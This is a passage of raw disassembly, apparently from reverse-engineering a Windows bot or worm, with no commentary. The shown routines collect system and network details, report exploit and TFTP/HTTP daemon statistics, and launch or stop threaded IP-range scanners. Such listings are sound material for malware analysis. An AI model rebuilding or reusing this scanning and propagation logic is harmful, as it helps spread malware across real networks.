push eax
call ds:dword_41D048 ; GetUserNameA
push ebx
lea eax, [esp+454h+var_208]
push eax
call ds:dword_41D0F4 ; GetSystemDirectoryA
call sub_418DA0
push dword_4265AC
lea eax, [esp+454h+var_208]
push dword_4265A8
push dword_4265A4
push dword_4265A0
push dword_42659C
push dword_426598
push eax
lea eax, [esp+46Ch+var_408]
push eax
mov eax, esi
push eax
lea eax, [esp+474h+var_308]
push eax
push edi
push dword ptr [esp+47Ch+var_444]
mov esi, offset Dest
push dword_426BE8
lea eax, [esp+484h+Args]
push esi
push dword_426BEC
push eax ; Args
push offset aSystemSCpuIXS@ ; "System: %s [CPU: %i x %s @ %dMhz] [RAM:"...
push [esp+494h+var_43C] ; int
push dword ptr [ebp+arg_4] ; char
push offset dword_4269BC ; int
call sub_417361
push 108h ; size_t
push 0 ; int
push esi ; void *
call _memset
mov ecx, [esp+4ACh+var_4]
add esp, 5Ch
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn 1Ch
sub_401CC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E82 proc near ; DATA XREF: .rdata:off_420BCC�o
var_18 = dword ptr -18h
Args = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
mov ebx, [ebp+arg_10]
push esi
push edi
push dword_4269BC
mov [ebp+Args], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+Args]
stosb
call sub_418FC6
pop ecx
mov eax, esi
push eax
call ds:dword_41D264 ; inet_addr
push 2
mov [ebp+var_18], eax
push 4
lea eax, [ebp+var_18]
push eax
call ds:dword_41D280 ; gethostbyaddr
test eax, eax
jnz short loc_401EEF
mov eax, esi
push eax ; Args
push offset aNetIpSHostNA ; "Net: IP: %s Host: N/A"
push ebx ; int
push dword ptr [ebp+arg_4] ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 14h
jmp short loc_401F0B
; ---------------------------------------------------------------------------
loc_401EEF: ; CODE XREF: sub_401E82+50�j
push dword ptr [eax]
lea eax, [ebp+Args]
push eax ; Args
push offset aNetIpSHostS ; "Net: IP: %s Host: %s"
push ebx ; int
push dword ptr [ebp+arg_4] ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 18h
loc_401F0B: ; CODE XREF: sub_401E82+6B�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn 1Ch
sub_401E82 endp
; =============== S U B R O U T I N E =======================================
sub_401F1C proc near ; DATA XREF: .rdata:off_420D1C�o
push 60h
mov eax, offset loc_41C2E1
call __EH_prolog3_GS
mov eax, [ebp+18h]
mov [ebp-68h], eax
xor eax, eax
mov byte ptr [ebp-30h], 0
lea edi, [ebp-2Fh]
stosd
stosd
stosd
mov ebx, [ebp+20h]
stosw
and dword ptr [ebp-58h], 0
and dword ptr [ebp-48h], 0
stosb
xor eax, eax
mov byte ptr [ebp-20h], 0
lea edi, [ebp-1Fh]
stosd
stosd
stosd
stosw
stosb
or edi, 0FFFFFFFFh
cmp byte_433945, 0
mov [ebp-50h], ebx
mov byte ptr [ebp-41h], 0
mov [ebp-5Ch], edi
mov [ebp-60h], edi
mov [ebp-64h], edi
mov [ebp-6Ch], edi
jnz short loc_401F83
call sub_41B775
test al, al
jz loc_402432
loc_401F83: ; CODE XREF: sub_401F1C+58�j
cmp byte_4268B4, 0
jnz short loc_401F99
call sub_418D17
test al, al
jz loc_402432
loc_401F99: ; CODE XREF: sub_401F1C+6E�j
and dword ptr [ebp-54h], 0
mov ecx, offset dword_424528
mov eax, ecx
lea esi, [eax+1]
loc_401FA7: ; CODE XREF: sub_401F1C+90�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FA7
jmp short loc_401FF6
; ---------------------------------------------------------------------------
loc_401FB0: ; CODE XREF: sub_401F1C+DC�j
mov edx, [ebx+4]
mov eax, ecx
loc_401FB5: ; CODE XREF: sub_401F1C+B1�j
mov cl, [eax]
cmp cl, [edx]
jnz short loc_401FD3
test cl, cl
jz short loc_401FCF
mov cl, [eax+1]
cmp cl, [edx+1]
jnz short loc_401FD3
inc eax
inc eax
inc edx
inc edx
test cl, cl
jnz short loc_401FB5
loc_401FCF: ; CODE XREF: sub_401F1C+A1�j
xor eax, eax
jmp short loc_401FD7
; ---------------------------------------------------------------------------
loc_401FD3: ; CODE XREF: sub_401F1C+9D�j
; sub_401F1C+A9�j
sbb eax, eax
sbb eax, edi
loc_401FD7: ; CODE XREF: sub_401F1C+B5�j
test eax, eax
jz short loc_401FFC
inc dword ptr [ebp-54h]
mov ecx, [ebp-54h]
imul ecx, 2Ch
lea ecx, dword_424528[ecx]
mov eax, ecx
lea esi, [eax+1]
loc_401FEF: ; CODE XREF: sub_401F1C+D8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401FEF
loc_401FF6: ; CODE XREF: sub_401F1C+92�j
sub eax, esi
jnz short loc_401FB0
jmp short loc_402001
; ---------------------------------------------------------------------------
loc_401FFC: ; CODE XREF: sub_401F1C+BD�j
cmp [ebp-54h], edi
jnz short loc_40201E
loc_402001: ; CODE XREF: sub_401F1C+DE�j
push offset aScanUnknownExp ; "Scan: Unknown Exploit."
push dword ptr [ebp-68h] ; int
push dword ptr [ebp+0Ch] ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 10h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_40201E: ; CODE XREF: sub_401F1C+E3�j
mov esi, [ebx+8]
mov eax, esi
mov ecx, offset a____0 ; "*.*.*.*"
call sub_419044
test eax, eax
jz short loc_402043
push dword ptr [ebx+0Ch] ; char *
mov byte ptr [ebp-41h], 1
call j__atol
pop ecx
mov [ebp-4Ch], eax
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_402043: ; CODE XREF: sub_401F1C+113�j
push esi ; char *
call j__atol
pop ecx
push 3
pop edx
cmp [ebp+1Ch], edx
mov [ebp-4Ch], eax
mov [ebp-48h], edx
jl short loc_402099
mov eax, edx
loc_40205A: ; CODE XREF: sub_401F1C+17B�j
mov ecx, [ebp-50h]
mov eax, [ecx+eax*4]
mov edi, eax
mov esi, offset aA ; "-a"
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_4020E7
mov edi, eax
mov esi, offset aB ; "-b"
mov ecx, edx
xor ebx, ebx
repe cmpsb
jz short loc_402099
mov edi, eax
mov esi, offset aC ; "-c"
mov ecx, edx
xor eax, eax
repe cmpsb
jz short loc_4020ED
inc dword ptr [ebp-48h]
movzx eax, word ptr [ebp-48h]
cmp eax, [ebp+1Ch]
jle short loc_40205A
loc_402099: ; CODE XREF: sub_401F1C+13A�j
; sub_401F1C+160�j
mov dword ptr [ebp-48h], 1
loc_4020A0: ; CODE XREF: sub_401F1C+125�j
; sub_401F1C+1CF�j ...
xor eax, eax
loc_4020A2: ; CODE XREF: sub_401F1C+19C�j
cmp byte_426D01[eax], 0
jz short loc_4020AE
inc dword ptr [ebp-58h]
loc_4020AE: ; CODE XREF: sub_401F1C+18D�j
add eax, 124h
cmp eax, 0CD50h
jbe short loc_4020A2
mov ecx, [ebp-58h]
mov eax, 0B4h
sub eax, ecx
cmp eax, [ebp-4Ch]
jnb short loc_4020F6
push eax ; Args
push offset aScanNotEnoughT ; "Scan: Not Enough Threads. %d Available."...
push dword ptr [ebp-68h] ; int
push dword ptr [ebp+0Ch] ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 14h
jmp loc_402432
; ---------------------------------------------------------------------------
loc_4020E7: ; CODE XREF: sub_401F1C+151�j
and dword ptr [ebp-48h], 0
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020ED: ; CODE XREF: sub_401F1C+16F�j
mov dword ptr [ebp-48h], 2
jmp short loc_4020A0
; ---------------------------------------------------------------------------
loc_4020F6: ; CODE XREF: sub_401F1C+1AB�j
add [ebp-4Ch], ecx
cmp byte ptr [ebp-41h], 0
jz loc_40221D
mov eax, [ebp-50h]
push dword ptr [eax+8]
lea eax, [ebp-30h]
push offset aS_19 ; "%s"
push 0Fh
pop ebx
push ebx ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-30h]
add esp, 10h
lea ecx, [eax+1]
loc_402124: ; CODE XREF: sub_401F1C+20D�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402124
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
push eax ; char *
call _sscanf
add esp, 18h
cmp dword ptr [ebp-5Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_40216C
push offset aX_ ; "x."
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40217E
; ---------------------------------------------------------------------------
loc_40216C: ; CODE XREF: sub_401F1C+23D�j
push dword ptr [ebp-5Ch]
push offset aD_ ; "%d."
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_40217E: ; CODE XREF: sub_401F1C+24E�j
cmp dword ptr [ebp-60h], 0FFFFFFFFh
mov esi, offset aSD_ ; "%s%d."
mov edi, offset aSx_ ; "%sx."
lea eax, [ebp-20h]
jnz short loc_40219F
push eax
push edi ; Format
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp short loc_4021B1
; ---------------------------------------------------------------------------
loc_40219F: ; CODE XREF: sub_401F1C+273�j
push dword ptr [ebp-60h]
push eax
push esi ; Format
lea eax, [ebp-20h]
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 14h
loc_4021B1: ; CODE XREF: sub_401F1C+281�j
cmp dword ptr [ebp-64h], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021C8
push eax
push edi ; Format
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp short loc_4021DA
; ---------------------------------------------------------------------------
loc_4021C8: ; CODE XREF: sub_401F1C+29C�j
push dword ptr [ebp-64h]
push eax
push esi ; Format
lea eax, [ebp-20h]
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 14h
loc_4021DA: ; CODE XREF: sub_401F1C+2AA�j
cmp dword ptr [ebp-6Ch], 0FFFFFFFFh
lea eax, [ebp-20h]
jnz short loc_4021F5
push eax
push offset aSx ; "%sx"
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 10h
jmp short loc_40220B
; ---------------------------------------------------------------------------
loc_4021F5: ; CODE XREF: sub_401F1C+2C5�j
push dword ptr [ebp-6Ch]
push eax
push offset aSD ; "%s%d"
lea eax, [ebp-20h]
push ebx ; Count
push eax ; Dest
call __snprintf
add esp, 14h
loc_40220B: ; CODE XREF: sub_401F1C+2D7�j
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_402211: ; CODE XREF: sub_401F1C+2FA�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_402211
jmp loc_4022F6
; ---------------------------------------------------------------------------
loc_40221D: ; CODE XREF: sub_401F1C+1E1�j
push dword_4269BC
mov byte ptr [ebp-40h], 0
xor eax, eax
lea edi, [ebp-3Fh]
stosd
stosd
stosd
stosw
lea esi, [ebp-40h]
stosb
call sub_418FC6
xor eax, eax
lea edi, [ebp-30h]
stosd
stosd
stosd
stosd
mov eax, esi
push eax
push offset aS_19 ; "%s"
push 0Fh
pop esi
lea eax, [ebp-30h]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp-30h]
add esp, 14h
lea ecx, [eax+1]
loc_402261: ; CODE XREF: sub_401F1C+34A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402261
sub eax, ecx
mov [ebp+eax-30h], dl
lea eax, [ebp-6Ch]
push eax
lea eax, [ebp-64h]
push eax
lea eax, [ebp-60h]
push eax
lea eax, [ebp-5Ch]
push eax
lea eax, [ebp-30h]
push offset aD_D_D_D_1 ; "%d.%d.%d.%d"
push eax ; char *
call _sscanf
mov eax, [ebp-48h]
add esp, 18h
sub eax, 0
jz short loc_4022D4
dec eax
jz short loc_4022BA
dec eax
jnz short loc_4022E9
push dword ptr [ebp-64h]
lea eax, [ebp-20h]
push dword ptr [ebp-60h]
push dword ptr [ebp-5Ch]
push offset aD_D_D_x ; "%d.%d.%d.x"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022BA: ; CODE XREF: sub_401F1C+37C�j
push dword ptr [ebp-60h]
lea eax, [ebp-20h]
push dword ptr [ebp-5Ch]
push offset aD_D_x_x ; "%d.%d.x.x"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_4022E9
; ---------------------------------------------------------------------------
loc_4022D4: ; CODE XREF: sub_401F1C+379�j
push dword ptr [ebp-5Ch]
lea eax, [ebp-20h]
push offset aD_x_x_x ; "%d.x.x.x"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 10h
loc_4022E9: ; CODE XREF: sub_401F1C+37F�j
; sub_401F1C+39C�j ...
lea eax, [ebp-20h]
lea edx, [eax+1]
loc_4022EF: ; CODE XREF: sub_401F1C+3D8�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4022EF
loc_4022F6: ; CODE XREF: sub_401F1C+2FC�j
sub eax, edx
cmp byte ptr [ebp-41h], 0
mov byte ptr [ebp+eax-20h], 0
mov eax, [ebp-50h]
jz short loc_40230B
push dword ptr [eax+0Ch]
jmp short loc_40230E
; ---------------------------------------------------------------------------
loc_40230B: ; CODE XREF: sub_401F1C+3E8�j
push dword ptr [eax+8] ; char *
loc_40230E: ; CODE XREF: sub_401F1C+3ED�j
call j__atol
push eax
mov eax, [ebp-54h]
imul eax, 2Ch
push dword_424548[eax]
lea eax, [ebp-20h]
push eax ; Args
push offset aScanSDUsingDTh ; "Scan: %s:%d Using %d Threads."
push dword ptr [ebp-68h] ; int
push dword ptr [ebp+0Ch] ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 20h
call sub_4192FB
mov ecx, [ebp-4Ch]
cmp [ebp-58h], ecx
jnb loc_402432
mov eax, [ebp-58h]
imul eax, 124h
sub ecx, [ebp-58h]
mov [ebp-50h], eax
mov [ebp-4Ch], ecx
mov esi, eax
loc_402361: ; CODE XREF: sub_401F1C+510�j
push 124h ; size_t
lea ebx, dword_426CF0[esi]
lea edi, [ebx-100h]
push 0 ; int
push edi ; void *
call _memset
lea eax, [ebp-30h]
push eax
push offset aS_19 ; "%s"
push 0Fh ; Count
push ebx ; Dest
call __snprintf
mov eax, ebx
add esp, 1Ch
lea ecx, [eax+1]
loc_402393: ; CODE XREF: sub_401F1C+47C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_402393
push dword ptr [ebp-68h]
sub eax, ecx
mov byte ptr dword_426CF0[esi+eax], dl
mov al, [ebp-41h]
push offset aS_19 ; "%s"
mov [ebx+12h], al
mov eax, [ebp-48h]
push 0FFh ; Count
push edi ; Dest
mov [ebx+18h], eax
call __snprintf
mov eax, edi
add esp, 10h
lea ecx, [eax+1]
loc_4023CA: ; CODE XREF: sub_401F1C+4B3�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4023CA
sub eax, ecx
mov byte_426BF0[esi+eax], dl
mov al, [ebp+0Ch]
mov [ebx+10h], al
mov eax, [ebp-54h]
push 8 ; Size
mov byte ptr [ebx+11h], 1
mov [ebx+14h], eax
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
mov [ebp-58h], eax
and dword ptr [ebp-4], 0
test eax, eax
jz short loc_402415
mov ecx, edi
push offset sub_413A2D
mov edi, offset aScanner ; "Scanner"
mov esi, eax
call sub_4140AB
mov esi, [ebp-50h]
jmp short loc_402417
; ---------------------------------------------------------------------------
loc_402415: ; CODE XREF: sub_401F1C+4DF�j
xor eax, eax
loc_402417: ; CODE XREF: sub_401F1C+4F7�j
or dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [eax]
add esi, 124h
dec dword ptr [ebp-4Ch]
mov [ebx+20h], eax
mov [ebp-50h], esi
jnz loc_402361
loc_402432: ; CODE XREF: sub_401F1C+61�j
; sub_401F1C+77�j ...
call sub_40467F
retn 1Ch
sub_401F1C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40243A proc near ; DATA XREF: .rdata:off_420D24�o
Args = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_4 = byte ptr 0Ch
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 1Ch
and dword ptr [esp+1Ch+Args], 0
push ebx
push esi
mov ebx, offset dword_433C48
push edi
mov [esp+28h+var_10], ebx
loc_402453: ; CODE XREF: sub_40243A+83�j
; sub_40243A+A0�j ...
mov eax, dword_433C4C
mov eax, [eax]
mov [esp+28h+var_14], eax
mov [esp+28h+var_18], ebx
loc_402462: ; CODE XREF: sub_40243A+67�j
mov eax, dword_433C4C
lea edi, [esp+28h+var_10]
lea esi, [esp+28h+var_18]
mov [esp+28h+var_C], eax
call sub_40166F
test al, al
jz short loc_4024F5
mov edi, offset aScanner ; "Scanner"
call sub_40164F
mov esi, eax
add esi, 5
push 8
pop ecx
xor eax, eax
repe cmpsb
lea esi, [esp+28h+var_18]
jz short loc_4024A3
lea edi, [esp+28h+var_8]
call sub_40168C
jmp short loc_402462
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_40243A+5C�j
call sub_40164F
mov edi, [eax+40h]
lea esi, [esp+28h+var_18]
call sub_40164F
mov eax, [eax]
call sub_414023
test al, al
jz short loc_402453
xor eax, eax
xor ecx, ecx
loc_4024C3: ; CODE XREF: sub_40243A+9E�j
cmp dword_426D10[ecx], edi
jz short loc_4024DF
add ecx, 124h
inc eax
cmp ecx, 0CD50h
jbe short loc_4024C3
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024DF: ; CODE XREF: sub_40243A+8F�j
inc dword ptr [esp+28h+Args]
imul eax, 124h
mov byte_426D01[eax], 0
jmp loc_402453
; ---------------------------------------------------------------------------
loc_4024F5: ; CODE XREF: sub_40243A+40�j
push dword ptr [esp+28h+Args] ; Args
push offset aScanAllScanThr ; "Scan: All Scan Threads Stopped. %d kill"...
push [ebp+arg_10] ; int
push dword ptr [ebp+arg_4] ; char
push offset dword_4269BC ; int
call sub_417361
add esp, 14h
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 1Ch
sub_40243A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=188h
sub_40251A proc near ; DATA XREF: .rdata:off_420D2C�o
var_208 = dword ptr -208h
Args = byte ptr -204h
var_203 = byte ptr -203h
var_4 = dword ptr -4
arg_4 = byte ptr 0Ch
arg_10 = dword ptr 18h
push ebp
lea ebp, [esp-188h]
sub esp, 208h
mov eax, dword_423064
xor eax, ebp
mov [ebp+188h+var_4], eax
mov eax, [ebp+188h+arg_10]
push esi
push edi
mov esi, 1FFh
push esi ; size_t
mov [ebp+188h+var_208], eax
lea eax, [ebp+188h+var_203]
push 0 ; int
push eax ; void *
mov [ebp+188h+Args], 0
call _memset
push offset aStatisticsExpl ; "Statistics: Exploits:"
lea eax, [ebp+188h+Args]
push esi ; Count
push eax ; Dest
xor edi, edi
call __snprintf
add esp, 18h
xor eax, eax
loc_40256B: ; CODE XREF: sub_40251A+7E�j
push dword_42454C[eax]
lea eax, dword_424528[eax]
push eax
lea eax, [ebp+188h+Args]
push eax
push offset aSSD ; "%s %s: %d"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 18h
inc edi
mov eax, edi
imul eax, 2Ch
cmp dword_424548[eax], 0
jnz short loc_40256B
lea eax, [ebp+188h+Args]
push eax
push offset aSDaemons ; "%s; Daemons:"
push esi ; Count
push eax ; Dest
call __snprintf
push dword_43394C
lea eax, [ebp+188h+Args]
push eax
push offset aSTftpD ; "%s TFTP: %d"
push esi ; Count
push eax ; Dest
call __snprintf
push dword_433940
lea eax, [ebp+188h+Args]
push eax
push offset aSHttpD ; "%s HTTP: %d"
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 38h
lea eax, [ebp+188h+Args]
pop edi
lea edx, [eax+1]
pop esi
loc_4025E1: ; CODE XREF: sub_40251A+CC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4025E1
sub eax, edx
mov [ebp+eax+188h+Args], cl
lea eax, [ebp+188h+Args]
push eax ; Args
push offset aS_19 ; "%s"
push [ebp+188h+var_208] ; int
push dword ptr [ebp+188h+arg_4] ; char
push offset dword_4269BC ; int
call sub_417361
mov ecx, [ebp+188h+var_4]
xor ecx, ebp
add esp, 14h
call sub_402710
add ebp, 188h
leave
retn 1Ch
sub_40251A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402624 proc near ; CODE XREF: sub_41B1A0+A6�p
jmp ds:dword_41D1DC
sub_402624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40262A proc near ; CODE XREF: sub_41B1A0+149�p
jmp ds:dword_41D1D8
sub_40262A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402630 proc near ; CODE XREF: sub_41B1A0+76�p
; sub_41B1A0+B9�p ...
jmp ds:dword_41D1D4
sub_402630 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402636 proc near ; CODE XREF: sub_41B1A0+C8�p
; sub_41B1A0+1C0�p ...
jmp ds:dword_41D1D0
sub_402636 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40263C proc near ; CODE XREF: sub_41B1A0+1B1�p
jmp ds:dword_41D1CC
sub_40263C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402642 proc near ; CODE XREF: sub_41A9DE+B2�p
jmp ds:dword_41D1C4
sub_402642 endp
; [00000005 BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40264D proc near ; DATA XREF: .rdata:004212A4�o
mov dword ptr [ecx], offset off_41D338
jmp sub_40109A
sub_40264D endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_402658(void *Memory,char)
sub_402658 proc near ; DATA XREF: .rdata:off_41D338�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov dword ptr [esi], offset off_41D338
call sub_40109A
test [esp+4+arg_0], 1
jz short loc_402674
push esi ; Memory
call j__free
pop ecx
loc_402674: ; CODE XREF: sub_402658+13�j
mov eax, esi
pop esi
retn 4
sub_402658 endp
; =============== S U B R O U T I N E =======================================
sub_40267A proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Grow(uint,bool)+D�p
push 44h
mov eax, offset loc_41C1D3
call __EH_prolog3
push offset aStringTooLong ; "string too long"
lea ecx, [ebp-28h]
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *)
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_421988
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D32C
call sub_4041BB
int 3 ; Trap to Debugger
sub_40267A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4026B9 proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint)+13�p
; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::erase(uint,uint)+F�p
var_10 = dword ptr -10h
push 44h
mov eax, offset loc_41C1D3
call __EH_prolog3
push offset aInvalidStringP ; "invalid string position"
lea ecx, [ebp-28h]
call ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(char const *)
and dword ptr [ebp-4], 0
lea eax, [ebp-28h]
push eax
lea ecx, [ebp-50h]
call sub_401065
push offset dword_4212A0
lea eax, [ebp-50h]
push eax
mov dword ptr [ebp-50h], offset off_41D338
call sub_4041BB
int 3 ; Trap to Debugger
push esi
push [esp+18h+var_10]
mov esi, ecx
call sub_4013E6
mov dword ptr [esi], offset off_41D338
mov eax, esi
pop esi
retn 4
sub_4026B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402710 proc near ; CODE XREF: sub_401C1D+9A�p
; sub_401CC0+1B7�p ...
cmp ecx, dword_423064
jnz short loc_40271A
rep retn
; ---------------------------------------------------------------------------
loc_40271A: ; CODE XREF: sub_402710+6�j
jmp ___report_gsfailure
sub_402710 endp
; [00000082 BYTES: COLLAPSED FUNCTION _LocaleUpdate::_LocaleUpdate(localeinfo_struct *). PRESS KEYPAD "+" TO EXPAND]
; [00000035 BYTES: COLLAPSED FUNCTION ___ascii_stricmp. PRESS KEYPAD "+" TO EXPAND]
; [000000D3 BYTES: COLLAPSED FUNCTION __stricmp_l. PRESS KEYPAD "+" TO EXPAND]
; [00000050 BYTES: COLLAPSED FUNCTION __stricmp. PRESS KEYPAD "+" TO EXPAND]
; [000000F0 BYTES: COLLAPSED FUNCTION __strnicmp_l. PRESS KEYPAD "+" TO EXPAND]
; [0000005C BYTES: COLLAPSED FUNCTION __strnicmp. PRESS KEYPAD "+" TO EXPAND]
; [00000092 BYTES: COLLAPSED FUNCTION __msize. PRESS KEYPAD "+" TO EXPAND]
; [00000008 BYTES: COLLAPSED FUNCTION $LN16. PRESS KEYPAD "+" TO EXPAND]
; [00000009 BYTES: COLLAPSED FUNCTION $LN12. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_402AE8 proc near ; CODE XREF: sub_419EA0+54�p
jmp ds:dword_41D194
sub_402AE8 endp
; [000000AD BYTES: COLLAPSED FUNCTION __snprintf. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j_j__free. PRESS KEYPAD "+" TO EXPAND]
; [0000005B BYTES: COLLAPSED FUNCTION _memmove_s. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_402BFB proc near ; CODE XREF: sub_401065+11�p
mov eax, ecx
and dword ptr [eax+4], 0
and dword ptr [eax+8], 0
mov dword ptr [eax], offset off_41D36C
retn
sub_402BFB endp
; [0000004E BYTES: COLLAPSED FUNCTION std::exception::exception(char const * const &). PRESS KEYPAD "+" TO EXPAND]
; [00000018 BYTES: COLLAPSED FUNCTION std::exception::exception(char const * const &,int). PRESS KEYPAD "+" TO EXPAND]
; [00000058 BYTES: COLLAPSED FUNCTION std::exception::exception(exception::exception const &). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_402CCA proc near ; CODE XREF: sub_401038+6�j
; sub_401043+9�p ...
cmp dword ptr [ecx+8], 0
mov dword ptr [ecx], offset off_41D36C
jz short locret_402CDF
push dword ptr [ecx+4] ; Memory
call _free
pop ecx
locret_402CDF: ; CODE XREF: sub_402CCA+A�j
retn
sub_402CCA endp
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_7. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_402CED(void *Memory,char)
sub_402CED proc near ; DATA XREF: .rdata:off_41D36C�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_402CCA
test [esp+4+arg_0], 1
jz short loc_402D03
push esi ; Memory
call j__free
pop ecx
loc_402D03: ; CODE XREF: sub_402CED+D�j
mov eax, esi
pop esi
retn 4
sub_402CED endp
; [000000AD BYTES: COLLAPSED FUNCTION __onexit_nolock. PRESS KEYPAD "+" TO EXPAND]
; [0000002F BYTES: COLLAPSED FUNCTION ___onexitinit. PRESS KEYPAD "+" TO EXPAND]
; [00000036 BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION $LN7. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_402E33 proc near ; CODE XREF: __init_pointers+15�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_425A80, eax
retn
sub_402E33 endp
; [000000FC BYTES: COLLAPSED FUNCTION __invoke_watson. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION __invalid_parameter. PRESS KEYPAD "+" TO EXPAND]
; [00000010 BYTES: COLLAPSED FUNCTION __invalid_parameter_noinfo. PRESS KEYPAD "+" TO EXPAND]
; [00000005 BYTES: COLLAPSED FUNCTION j__free. PRESS KEYPAD "+" TO EXPAND]
; [0000007B BYTES: COLLAPSED FUNCTION _memcpy_s. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_402FED proc near ; CODE XREF: sub_402FFB+3�p
push ecx
mov dword ptr [ecx], offset off_41D38C
call sub_407F55
pop ecx
retn
sub_402FED endp
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_402FFB(void *Memory,char)
